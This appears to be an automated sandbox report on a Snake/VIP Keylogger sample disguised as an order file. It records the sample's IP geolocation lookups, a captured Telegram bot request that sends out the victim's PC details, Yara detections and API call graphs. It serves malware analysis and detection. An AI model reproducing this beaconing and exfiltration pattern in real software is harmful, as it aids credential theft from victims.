                                          2024-07-26 07:03:19 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          5 | 192.168.2.7 | 49716 | 188.114.97.3 | 443 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-26 07:03:22 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:22 UTC | 703 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:22 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 15
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4h3kqlRWGDe1EdpvTckYuPvI4GC9W9zRp1UMBSH1%2Ff5MibUc5pDm4IOQQ5%2BPNrsF%2FUt2XtIQTrvrclXlH5I9U6Jr0PJFtRpYgQjt8kOejcSHmbR0MLC1G9B6QZsZyKDCVY7pQ54p"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a92878f188bc457-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:22 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          6 | 192.168.2.7 | 49720 | 188.114.97.3 | 443 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-26 07:03:23 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2024-07-26 07:03:24 UTC | 713 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:24 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 17
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ng%2BQ9Yv%2B0ZqkhX%2Fb2xHOxxW6kcsNLz%2BKt8ryjNZTZwtkH56AG7sYT06GmkPnTxp2RzGIb2Le7Gr%2BahjDiQsoe0aH528y6GQru0V%2BodvI4dq4EGlI%2BLJMrHuPqD6dWP5kzBU%2Bhrkn"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a9287975d62436f-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:24 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          7 | 192.168.2.7 | 49725 | 188.114.97.3 | 443 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-26 07:03:26 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:27 UTC | 705 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:26 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 19
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cs6sVnYWhBNL7IfcE7g4biaK16fO4Gw7I5ae%2B2geEMKIfcXIDghlK2mIqDc7S8CkEDAr%2BuQp3qYPnJ25uAL5bbE5YOccxdyUSBVtPIFKph%2Fieh0Sdx%2BJZ1HVYe6AdHq2hNVD4Rjs"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a9287a97867440e-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:27 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          8 | 192.168.2.7 | 49726 | 149.154.167.220 | 443 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-26 07:03:27 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                          Host: api.telegram.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:27 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx/1.18.0
                                          Date: Fri, 26 Jul 2024 07:03:27 GMT
                                          Content-Type: application/json
                                          Content-Length: 55
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          2024-07-26 07:03:27 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                          Target ID:1
                                          Start time:03:03:04
                                          Start date:26/07/2024
                                          Path:C:\Users\user\Desktop\new order 00041221.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\new order 00041221.exe"
                                          Imagebase:0x280000
                                          File size:740'864 bytes
                                          MD5 hash:F0C82F395D37FA87114CA7EF075695C8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:03:03:05
                                          Start date:26/07/2024
                                          Path:C:\Users\user\Desktop\new order 00041221.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\new order 00041221.exe"
                                          Imagebase:0xbd0000
                                          File size:740'864 bytes
                                          MD5 hash:F0C82F395D37FA87114CA7EF075695C8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:false


                                            Execution Graph

                                            Execution Coverage:11.4%
                                            Dynamic/Decrypted Code Coverage:91.5%
                                            Signature Coverage:0.9%
                                            Total number of Nodes:328
                                            Total number of Limit Nodes:22
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277495288.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4df0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f52b38d7b9db2801291b7f30fae37056a597021abbd9071887eec498fdb89cd6
                                            • Instruction ID: 7f69581b325ae71894d610494a8950a317bec46c6575a3b24eee5786f326d2c2
                                            • Opcode Fuzzy Hash: f52b38d7b9db2801291b7f30fae37056a597021abbd9071887eec498fdb89cd6
                                            • Instruction Fuzzy Hash: 82531F34A00219DFDB24DF68C898A9DB7B2FF49300F568599E919AB361DB31ED81CF50
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277443353.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4dd0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e19e013944b1643865b08b84e2ac1e89da4a95a85a9ad394f690832078ef8654
                                            • Instruction ID: b767f5774f20ddf819f49059e5dd4274eeb9784a3c9461c62e79f5427202d093
                                            • Opcode Fuzzy Hash: e19e013944b1643865b08b84e2ac1e89da4a95a85a9ad394f690832078ef8654
                                            • Instruction Fuzzy Hash: BE223B34A10219CFDB24DF68D884A9DBBB2FF85314F15C1A9E409AB265DB30ED85CF90
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277495288.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4df0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43974b95db2d4a54d115d376757c0890094ca994956a7a7327c8afc4fc37208d
                                            • Instruction ID: 6167f4e95775e911fa89ef20729b538bbeeb2c5a59145b667f95d17350633f74
                                            • Opcode Fuzzy Hash: 43974b95db2d4a54d115d376757c0890094ca994956a7a7327c8afc4fc37208d
                                            • Instruction Fuzzy Hash: 36029475B00701CFD725DF68C884AAABBB2FF89304B168569D6199B361DB31FC42CB91
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03e2e0b5ccfe0140e1527ef72a3e4dd2acce9ea30d9924aa2ab3b99e0e834f42
                                            • Instruction ID: 41f2216d5700e054c1bf2c503a82551dd2163be7abd6cd00963873474d401a14
                                            • Opcode Fuzzy Hash: 03e2e0b5ccfe0140e1527ef72a3e4dd2acce9ea30d9924aa2ab3b99e0e834f42
                                            • Instruction Fuzzy Hash: 8AA18435E003198FCB14EFA4D8949EDBBBBFF99314F258619E415AF260EB30A945CB50
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64d69cb58e4c14fb46136ac93849c8d2b53d0705b0c8df95b10238673a05d249
                                            • Instruction ID: 7cf52b27d976d6266d8d71de9fd0fb043454316b315a2aae28bc548418461e3f
                                            • Opcode Fuzzy Hash: 64d69cb58e4c14fb46136ac93849c8d2b53d0705b0c8df95b10238673a05d249
                                            • Instruction Fuzzy Hash: 0F918135E003099FCB14EFA4DC849DDBBBBFF99314F258619E415AB264EB30A945CB50
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a787b28ac42564aec65302965fb165b73768f9efc73da164a5c26a414c283ea7
                                            • Instruction ID: a2a10bba392a765dcfb30a110ead81eda2956e5f0ce6200a75a5ee4da69a7d23
                                            • Opcode Fuzzy Hash: a787b28ac42564aec65302965fb165b73768f9efc73da164a5c26a414c283ea7
                                            • Instruction Fuzzy Hash: DD6135B1D44719CFEB68CF66C8407E9BBB6BF89300F14D1EA9419A6254EB704A85CF40
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ce43b2bc501ba95545fb7f9db8ff0c9f9eaa302a30b502067685940e85d61de
                                            • Instruction ID: 07dc6a8201bf8154e53d17f9418836d4ba044d368b49924671638ae092e71a97
                                            • Opcode Fuzzy Hash: 0ce43b2bc501ba95545fb7f9db8ff0c9f9eaa302a30b502067685940e85d61de
                                            • Instruction Fuzzy Hash: 0E3143B0D096888FE719CFA6C9143DEBFB6AFCA300F08C0ABD409A6265DB740945CF51
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6af1995c5a74cdd87594ec218d2aac71372cbf2a1db4fccb5314942b53ff41fd
                                            • Instruction ID: 3c920edbcb4ae6c8fcf4a208507dd1aa65a86efe0b4a2c7bee3c3b62d8592718
                                            • Opcode Fuzzy Hash: 6af1995c5a74cdd87594ec218d2aac71372cbf2a1db4fccb5314942b53ff41fd
                                            • Instruction Fuzzy Hash: DA21E8B1D046189BEB58CFABC9543EEFAF7AFC8300F14C06AD419A6264DB740A45CF90

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 04C82DD6
                                            • GetCurrentThread.KERNEL32 ref: 04C82E13
                                            • GetCurrentProcess.KERNEL32 ref: 04C82E50
                                            • GetCurrentThreadId.KERNEL32 ref: 04C82EA9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 38a74f55583355d7edc931e8ce3dc2902a4a15ee8749027972df96e0b0221a31
                                            • Instruction ID: 9994a7072f0f616d9df05c6a378ce36cfa3e78be124af565be04ceb928f067cc
                                            • Opcode Fuzzy Hash: 38a74f55583355d7edc931e8ce3dc2902a4a15ee8749027972df96e0b0221a31
                                            • Instruction Fuzzy Hash: F65175B0D00349CFDB14DFAAC548B9EBBF2EB48305F2084AAE119A7290DB746945CF65

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 04C82DD6
                                            • GetCurrentThread.KERNEL32 ref: 04C82E13
                                            • GetCurrentProcess.KERNEL32 ref: 04C82E50
                                            • GetCurrentThreadId.KERNEL32 ref: 04C82EA9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 9bad9e6791610dfa4555e5414dbc214d8add22dc6d1e304dd06ceed6f6f37210
                                            • Instruction ID: c856d43181d6ff538a4fb9bd4908c084e9af42a1514cff928dea37c5e21af524
                                            • Opcode Fuzzy Hash: 9bad9e6791610dfa4555e5414dbc214d8add22dc6d1e304dd06ceed6f6f37210
                                            • Instruction Fuzzy Hash: E05166B0D00309CFDB14EFAAD548B9EBBF2EB48315F20846DE119A7290DB746945CF65

                                            Control-flow Graph

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C87622
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c8a41c9f75713ba63a9f6dc7fe4644aac4a1a382b9a70f0c40711b7789912e49
                                            • Instruction ID: 18bdd4fd84d1565c24a783dfb0df16a5eddf488da248e30f0e78984e98d397b8
                                            • Opcode Fuzzy Hash: c8a41c9f75713ba63a9f6dc7fe4644aac4a1a382b9a70f0c40711b7789912e49
                                            • Instruction Fuzzy Hash: 2D919EB1C0A3899FDB02CFA5C8916CDBFB1EF1A314F29819AE4549B2A2D3355847CB51

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B75A16
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 215eba0c0362377e616ea2383d85fc95e64ed0ef26fd121534bfc49747b6d768
                                            • Instruction ID: 930ce2baa7cd8594f6dc43e253621c7fe0eb2312012aebef1854c6cd02604a35
                                            • Opcode Fuzzy Hash: 215eba0c0362377e616ea2383d85fc95e64ed0ef26fd121534bfc49747b6d768
                                            • Instruction Fuzzy Hash: 42A14CB2D00319CFEB64DF68C8417ADBBB2FF48314F1485A9E819A7284DB749985CF91

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B75A16
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: dba425e54b61d47dfe68ca6fdcf67acb3b805828cfb84994303d59b34d3ea0f2
                                            • Instruction ID: f4ea434c9e00993a39b9f6a82eb5aa09018796a5087757c530651a8a64e32fb5
                                            • Opcode Fuzzy Hash: dba425e54b61d47dfe68ca6fdcf67acb3b805828cfb84994303d59b34d3ea0f2
                                            • Instruction Fuzzy Hash: E5914DB2D00319CFEB64DF68C8417ADBBB2FF48310F1485A9E819A7284DB759985CF91

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 04C80C9E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 986ea0cd89205ad6c8ebc55a3fa624ced483a9cde2dcfc44275985680c5ee24c
                                            • Instruction ID: a46191c36e3340839521ab291e83faf9b324d1b4a6d0b880865a4c50c2c8f0f2
                                            • Opcode Fuzzy Hash: 986ea0cd89205ad6c8ebc55a3fa624ced483a9cde2dcfc44275985680c5ee24c
                                            • Instruction Fuzzy Hash: 97712570A00B058FD724EF2AD45576ABBF2BF88318F008A2DD48AD7A50D775F949CB90

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C87622
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 08c82d7a88f46f70ef60c24cd3c75d16aa3451abeef8694a49cc488a86ca50a5
                                            • Instruction ID: d8078db08c9184fa58f73694ed594469852d74ac9f2c4901020d7653682e925f
                                            • Opcode Fuzzy Hash: 08c82d7a88f46f70ef60c24cd3c75d16aa3451abeef8694a49cc488a86ca50a5
                                            • Instruction Fuzzy Hash: 9F41CEB1D003489FDB14DF9AC880ADEBBB6FF48314F24812EE818AB210D771A941CF90

                                            APIs
